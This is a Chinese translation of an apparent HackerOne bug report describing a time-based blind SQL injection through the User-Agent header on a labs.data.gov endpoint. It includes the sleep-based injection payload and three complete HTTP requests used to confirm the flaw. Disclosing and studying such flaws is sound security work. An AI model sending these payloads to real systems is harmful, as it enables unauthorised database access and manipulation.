0x00漏洞信息

披露者：harisec

危害程度：高危

漏洞類型：sql注入

0x01漏洞介紹

通過訪問：

https://labs.data.gov/dashboard/datagov/csv_to_json抓包在user-agent頭在中進(jìn)行SQL注入

我沒有從數(shù)據(jù)庫中提取任何數(shù)據(jù)，我已經(jīng)使用sleep函數(shù) SQL查詢確認(rèn)了該漏洞。該命令與算術(shù)操作相結(jié)合，將導(dǎo)致服務(wù)器響應(yīng)不同的時(shí)間取決于算術(shù)運(yùn)算的結(jié)果。

例如，將該值設(shè)置：

Mozilla/5.0 (windows NT 6.1; WOW64) AppleWebKit/537.36 (Khtml, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR'

到User-Agent頭部將導(dǎo)致服務(wù)器延遲響應(yīng)25（5×5）秒。

要重現(xiàn)，請(qǐng)發(fā)送以下HTTPS請(qǐng)求：

GET /dashboard/datagov/csv_to_json HTTP/1.1

Referer: 1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5),0))OR' X-Forwarded-For: 1

X-Requested-With: XMLHttpRequest

Host: labs.data.gov

Connection: Keep-alive

Accept-Encoding: gzip,deflate

Accept: */*

服務(wù)器將在25（5 * 5）秒后響應(yīng)-與User-Agent:標(biāo)頭的值相同。

現(xiàn)在，讓服務(wù)器立即響應(yīng)。我們將發(fā)送值sleep（5 * 5 * 0），它等于0。

GET /dashboard/datagov/csv_to_json HTTP/1.1

Referer: 1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(5*5*0),0))OR'

X-Forwarded-For: 1

X-Requested-With: XMLHttpRequest

Host: labs.data.gov

Connection: Keep-alive

Accept-Encoding: gzip,deflate

Accept: */*

服務(wù)器立即響應(yīng)為5 * 5 * 0 = 0。

讓我們通過另一個(gè)請(qǐng)求進(jìn)行確認(rèn)：

GET /dashboard/datagov/csv_to_json HTTP/1.1

Referer: 1

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87'XOR(if(now()=sysdate(),sleep(6*6-30),0))OR'

X-Forwarded-For: 1

X-Requested-With: XMLHttpRequest

Host: labs.data.gov

Connection: Keep-alive

Accept-Encoding: gzip,deflate

Accept: */*

這次，有效負(fù)載包含6 * 6-30，等于6。服務(wù)器在6秒鐘后響應(yīng)。

這些只是我嘗試確認(rèn)此問題的帶有各種算術(shù)運(yùn)算的SQL查詢中的一些。

0x02漏洞影響

攻擊者可以操縱發(fā)送到MySQL數(shù)據(jù)庫的SQL語句，并注入惡意SQL語句。攻擊者可以更改對(duì)數(shù)據(jù)庫執(zhí)行的SQL語句的命令。

翻譯自hackerone